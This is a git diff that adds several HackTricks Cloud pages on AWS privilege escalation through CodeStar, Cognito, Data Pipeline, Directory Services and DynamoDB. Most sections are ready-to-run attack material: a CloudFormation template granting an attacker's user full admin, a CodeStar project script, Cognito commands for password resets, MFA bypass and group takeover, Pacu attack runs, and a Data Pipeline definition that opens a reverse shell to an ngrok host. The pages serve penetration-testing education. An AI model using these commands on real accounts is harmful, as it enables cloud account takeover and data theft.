+{% endhint %} + +This is the created policy the user can privesc to (the project name was `supercodestar`): + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "1", + "Effect": "Allow", + "Action": [ + "codestar:*", + "iam:GetPolicy*", + "iam:ListPolicyVersions" + ], + "Resource": [ + "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", + "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", + "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" + ] + }, + { + "Sid": "2", + "Effect": "Allow", + "Action": [ + "codestar:DescribeUserProfile", + "codestar:ListProjects", + "codestar:ListUserProfiles", + "codestar:VerifyServiceRole", + "cloud9:DescribeEnvironment*", + "cloud9:ValidateEnvironmentName", + "cloudwatch:DescribeAlarms", + "cloudwatch:GetMetricStatistics", + "cloudwatch:ListMetrics", + "codedeploy:BatchGet*", + "codedeploy:List*", + "codestar-connections:UseConnection", + "ec2:DescribeInstanceTypeOfferings", + "ec2:DescribeInternetGateways", + "ec2:DescribeNatGateways", + "ec2:DescribeRouteTables", + "ec2:DescribeSecurityGroups", + "ec2:DescribeSubnets", + "ec2:DescribeVpcs", + "events:ListRuleNamesByTarget", + "iam:GetAccountSummary", + "iam:GetUser", + "iam:ListAccountAliases", + "iam:ListRoles", + "iam:ListUsers", + "lambda:List*", + "sns:List*" + ], + "Resource": [ + "*" + ] + }, + { + "Sid": "3", + "Effect": "Allow", + "Action": [ + "codestar:*UserProfile", + "iam:GenerateCredentialReport", + "iam:GenerateServiceLastAccessedDetails", + "iam:CreateAccessKey", + "iam:UpdateAccessKey", + "iam:DeleteAccessKey", + "iam:UpdateSSHPublicKey", + "iam:UploadSSHPublicKey", + "iam:DeleteSSHPublicKey", + "iam:CreateServiceSpecificCredential", + "iam:UpdateServiceSpecificCredential", + "iam:DeleteServiceSpecificCredential", + "iam:ResetServiceSpecificCredential", + "iam:Get*", + "iam:List*" + ], + "Resource": [ + "arn:aws:iam::947247140022:user/${aws:username}" + ] + } + ] +} +``` + +{% hint 
style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md new file mode 100644 index 0000000000..60d1b28c4a --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md @@ -0,0 +1,118 @@ +# iam:PassRole, codestar:CreateProject + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. + +To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: + +{% code title="toolchain.json" %} +```json +{ + "Resources": { + "supercodestar": { + "Type": "AWS::IAM::ManagedPolicy", + "Properties": { + "ManagedPolicyName": "CodeStar_supercodestar", + "PolicyDocument": { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": "*", + "Resource": "*" + } + ] + }, + "Users": [ + "" + ] + } + } + } +} +``` +{% endcode %} + +Also **upload** this `empty zip` file to the **bucket**: + +{% file src="../../../../.gitbook/assets/empty.zip" %} + +Remember that the **bucket with both files must be accessible by the victim account**. 
+ +With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: + +```bash +PROJECT_NAME="supercodestar" + +# Crecte the source JSON +## In this JSON the bucket and key (path) to the empry.zip file is used +SOURCE_CODE_PATH="/tmp/surce_code.json" +SOURCE_CODE="[ + { + \"source\": { + \"s3\": { + \"bucketName\": \"privesc\", + \"bucketKey\": \"empty.zip\" + } + }, + \"destination\": { + \"codeCommit\": { + \"name\": \"$PROJECT_NAME\" + } + } + } +]" +printf "$SOURCE_CODE" > $SOURCE_CODE_PATH + +# Create the toolchain JSON +## In this JSON the bucket and key (path) to the toolchain.json file is used +TOOLCHAIN_PATH="/tmp/tool_chain.json" +TOOLCHAIN="{ + \"source\": { + \"s3\": { + \"bucketName\": \"privesc\", + \"bucketKey\": \"toolchain.json\" + } + }, + \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" +}" +printf "$TOOLCHAIN" > $TOOLCHAIN_PATH + +# Create the codestar project that will use the cloudformation epxloit to privesc +aws codestar create-project \ + --name $PROJECT_NAME \ + --id $PROJECT_NAME \ + --source-code file://$SOURCE_CODE_PATH \ + --toolchain file://$TOOLCHAIN_PATH +``` + +This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc\_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md new file mode 100644 index 0000000000..fea511a1ea --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md @@ -0,0 +1,342 @@ +# AWS - Cognito Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Cognito + +For more info about Cognito check: + +{% content-ref url="../aws-services/aws-cognito-enum/" %} +[aws-cognito-enum](../aws-services/aws-cognito-enum/) +{% endcontent-ref %} + +### Gathering credentials from Identity Pool + +As Cognito can grant **IAM role credentials** to both **authenticated** an **unauthenticated** **users**, if you locate the **Identity Pool ID** of an application (should be hardcoded on it) you can obtain new credentials and therefore privesc (inside an AWS account where you probably didn't even have any credential previously). + +For more information [**check this page**](../aws-unauthenticated-enum-access/#cognito). + +**Potential Impact:** Direct privesc to the services role attached to unauth users (and probably to the one attached to auth users). + +### `cognito-identity:SetIdentityPoolRoles`, `iam:PassRole` + +With this permission you can **grant any cognito role** to the authenticated/unauthenticated users of the cognito app. + +```bash +aws cognito-identity set-identity-pool-roles \ + --identity-pool-id \ + --roles unauthenticated= + +# Get credentials +## Get one ID +aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367" +## Get creds for that id +aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374" +``` + +If the cognito app **doesn't have unauthenticated users enabled** you might need also the permission `cognito-identity:UpdateIdentityPool` to enable it. + +**Potential Impact:** Direct privesc to any cognito role. + +### `cognito-identity:update-identity-pool` + +An attacker with this permission could set for example a Cognito User Pool under his control or any other identity provider where he can login as a **way to access this Cognito Identity Pool**. Then, just **login** on that user provider will **allow him to access the configured authenticated role in the Identity Pool**. 
+ +```bash +# This example is using a Cognito User Pool as identity provider +## but you could use any other identity provider +aws cognito-identity update-identity-pool \ + --identity-pool-id \ + --identity-pool-name \ + [--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \ + --cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false + +# Now you need to login to the User Pool you have configured +## after having the id token of the login continue with the following commands: + +# In this step you should have already an ID Token +aws cognito-identity get-id \ + --identity-pool-id \ + --logins cognito-idp..amazonaws.com/= + +# Get the identity_id from thr previous commnad response +aws cognito-identity get-credentials-for-identity \ + --identity-id \ + --logins cognito-idp..amazonaws.com/= +``` + +It's also possible to **abuse this permission to allow basic auth**: + +```bash +aws cognito-identity update-identity-pool \ + --identity-pool-id \ + --identity-pool-name \ + --allow-unauthenticated-identities + --allow-classic-flow +``` + +**Potential Impact**: Compromise the configured authenticated IAM role inside the identity pool. + +### `cognito-idp:AdminAddUserToGroup` + +This permission allows to **add a Cognito user to a Cognito group**, therefore an attacker could abuse this permission to add an user under his control to other groups with **better** privileges or **different IAM roles**: + +```bash +aws cognito-idp admin-add-user-to-group \ + --user-pool-id \ + --username \ + --group-name +``` + +**Potential Impact:** Privesc to other Cognito groups and IAM roles attached to User Pool Groups. 
+ +### (`cognito-idp:CreateGroup` | `cognito-idp:UpdateGroup`), `iam:PassRole` + +An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles: + +{% code overflow="wrap" %} +```bash +aws cognito-idp create-group --group-name Hacked --user-pool-id --role-arn +``` +{% endcode %} + +**Potential Impact:** Privesc to other Cognito IAM roles. + +### `cognito-idp:AdminConfirmSignUp` + +This permission allows to **verify a signup**. By default anyone can sign in Cognito applications, if that is left, a user could create an account with any data and verify it with this permission. + +```bash +aws cognito-idp admin-confirm-sign-up \ + --user-pool-id \ + --username +``` + +**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users if you can register a new user. Indirect privesc to other app functionalities being able to confirm any account. + +### `cognito-idp:AdminCreateUser` + +This permission would allow an attacker to create a new user inside the user pool. The new user is created as enabled, but will need to change its password. + +```bash +aws cognito-idp admin-create-user \ + --user-pool-id \ + --username \ + [--user-attributes ] ([Name=email,Value=email@gmail.com]) + [--validation-data ] + [--temporary-password ] +``` + +**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user + +### `cognito-idp:AdminEnableUser` + +This permissions can help in. a very edge-case scenario where an attacker found the credentials of a disabled user and he needs to **enable it again**. 
+ +```bash +aws cognito-idp admin-enable-user \ + --user-pool-id \ + --username +``` + +**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users and permissions of the user if the attacker had credentials for a disabled user. + +### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`** + +This permission allows to login with the [**method ADMIN\_USER\_PASSWORD\_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link. + +### `cognito-idp:AdminSetUserPassword` + +This permission would allow an attacker to **change the password of any user**, making him able to impersonate any user (that doesn't have MFA enabled). + +```bash +aws cognito-idp admin-set-user-password \ + --user-pool-id \ + --username \ + --password \ + --permanent +``` + +**Potential Impact:** Direct privesc to potentially any user, so access to all the groups each user is member of and access to the Identity Pool authenticated IAM role. + +### `cognito-idp:AdminSetUserSettings` | `cognito-idp:SetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool` + +**AdminSetUserSettings**: An attacker could potentially abuse this permission to set a mobile phone under his control as **SMS MFA of a user**. + +```bash +aws cognito-idp admin-set-user-settings \ + --user-pool-id \ + --username \ + --mfa-options +``` + +**SetUserMFAPreference:** Similar to the previous one this permission can be used to set MFA preferences of a user to bypass the MFA protection. + +```bash +aws cognito-idp admin-set-user-mfa-preference \ + [--sms-mfa-settings ] \ + [--software-token-mfa-settings ] \ + --username \ + --user-pool-id +``` + +**SetUserPoolMfaConfig**: Similar to the previous one this permission can be used to set MFA preferences of a user pool to bypass the MFA protection. 
+ +```bash +aws cognito-idp set-user-pool-mfa-config \ + --user-pool-id \ + [--sms-mfa-configuration ] \ + [--software-token-mfa-configuration ] \ + [--mfa-configuration ] +``` + +**UpdateUserPool:** It's also possible to update the user pool to change the MFA policy. [Check cli here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html). + +**Potential Impact:** Indirect privesc to potentially any user the attacker knows the credentials of, this could allow to bypass the MFA protection. + +### `cognito-idp:AdminUpdateUserAttributes` + +An attacker with this permission could change the email or phone number or any other attribute of a user under his control to try to obtain more privileges in an underlaying application.\ +This allows to change an email or phone number and set it as verified. + +```bash +aws cognito-idp admin-update-user-attributes \ + --user-pool-id \ + --username \ + --user-attributes +``` + +**Potential Impact:** Potential indirect privesc in the underlying application using Cognito User Pool that gives privileges based on user attributes. + +### `cognito-idp:CreateUserPoolClient` | `cognito-idp:UpdateUserPoolClient` + +An attacker with this permission could **create a new User Pool Client less restricted** than already existing pool clients. For example, the new client could allow any kind of method to authenticate, don't have any secret, have token revocation disabled, allow tokens to be valid for a longer period... + +The same can be be don if instead of creating a new client, an **existing one is modified**. + +In the [**command line**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (or the [**update one**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) you can see all the options, check it!. + +```bash +aws cognito-idp create-user-pool-client \ + --user-pool-id \ + --client-name \ + [...] 
+``` + +**Potential Impact:** Potential indirect privesc to the Identity Pool authorized user used by the User Pool by creating a new client that relax the security measures and makes possible to an attacker to login with a user he was able to create. + +### `cognito-idp:CreateUserImportJob` | `cognito-idp:StartUserImportJob` + +An attacker could abuse this permission to create users y uploading a csv with new users. + +```bash +# Create a new import job +aws cognito-idp create-user-import-job \ + --job-name \ + --user-pool-id \ + --cloud-watch-logs-role-arn + +# Use a new import job +aws cognito-idp start-user-import-job \ + --user-pool-id \ + --job-id + +# Both options before will give you a URL where you can send the CVS file with the users to create +curl -v -T "PATH_TO_CSV_FILE" \ + -H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL" +``` + +(In the case where you create a new import job you might also need the iam passrole permission, I haven't tested it yet). + +**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user. + +### `cognito-idp:CreateIdentityProvider` | `cognito-idp:UpdateIdentityProvider` + +An attacker could create a new identity provider to then be able to **login through this provider**. + +```bash +aws cognito-idp create-identity-provider \ + --user-pool-id \ + --provider-name \ + --provider-type \ + --provider-details \ + [--attribute-mapping ] \ + [--idp-identifiers ] +``` + +**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user. + +### cognito-sync:\* Analysis + +This is a very common permission by default in roles of Cognito Identity Pools. Even if a wildcard in a permissions always looks bad (specially coming from AWS), the **given permissions aren't super useful from an attackers perspective**. 
+ +This permission allows to read use information of Identity Pools and Identity IDs inside Identity Pools (which isn't sensitive info).\ +Identity IDs might have [**Datasets**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) assigned to them, which are information of the sessions (AWS define it like a **saved game**). It might be possible that this contain some kind of sensitive information (but the probability is pretty low). You can find in the [**enumeration page**](../aws-services/aws-cognito-enum/) how to access this information. + +An attacker could also use these permissions to **enroll himself to a Cognito stream that publish changes** on these datases or a **lambda that triggers on cognito events**. I haven't seen this being used, and I wouldn't expect sensitive information here, but it isn't impossible. + +### Automatic Tools + +* [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. + +For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. 
+ +#### Usage + +Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: + +```bash +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX +``` + +Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: + +```bash +Pacu (new:test) > run cognito__enum +``` + +* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation. + +#### Installation + +```bash +$ pip install cognito-scanner +``` + +#### Usage + +```bash +$ cognito-scanner --help +``` + +For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md new file mode 100644 index 0000000000..4e5b80724b --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md @@ -0,0 +1,100 @@ +# AWS - Datapipeline Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## datapipeline + +For more info about datapipeline check: + +{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %} +[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) +{% endcontent-ref %} + +### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` + +Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** + +```bash +aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string +``` + +After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: + +```json +{ + "objects": [ + { + "id" : "CreateDirectory", + "type" : "ShellCommandActivity", + "command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", + "runsOn" : {"ref": "instance"} + }, + { + "id": "Default", + "scheduleType": "ondemand", + "failureAndRerunMode": "CASCADE", + "name": "Default", + "role": "assumable_datapipeline", + "resourceRole": "assumable_datapipeline" + }, + { + "id" : "instance", + "name" : "instance", + "type" : "Ec2Resource", + "actionOnTaskFailure" : "terminate", + "actionOnResourceFailure" : "retryAll", + "maximumRetries" : "1", + "instanceType" : "t2.micro", + "securityGroups" : ["default"], + "role" : "assumable_datapipeline", + "resourceRole" : "assumable_ec2_profile_instance" + }] +} +``` + +{% hint style="info" %} +Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. + +Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). 
+{% endhint %} + +```bash +aws datapipeline put-pipeline-definition --pipeline-id \ + --pipeline-definition file:///pipeline/definition.json +``` + +The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. + +**Potential Impact:** Direct privesc to the ec2 service role specified. + +## References + +* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md new file mode 100644 index 0000000000..33898f0482 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md @@ -0,0 +1,60 @@ +# AWS - Directory Services Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Directory Services + +For more info about directory services check: + +{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %} +[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md) +{% endcontent-ref %} + +### `ds:ResetUserPassword` + +This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ +By default, the only existent user is **Admin**. + +``` +aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. +``` + +### AWS Management Console + +It's possible to enable an **application access URL** that users from AD can access to login: + +
+ +And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console: + +
+ +There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md new file mode 100644 index 0000000000..3fedf519ad --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md @@ -0,0 +1,49 @@ +# AWS - DynamoDB Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## dynamodb + +For more info about dynamodb check: + +{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} +[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) +{% endcontent-ref %} + +### Post Exploitation + +As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**: + +{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %} +[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md) +{% endcontent-ref %} + +### TODO: Read data abusing data Streams + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md new file mode 100644 index 0000000000..29cc69d951 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md @@ -0,0 +1,53 @@ +# AWS - EBS Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
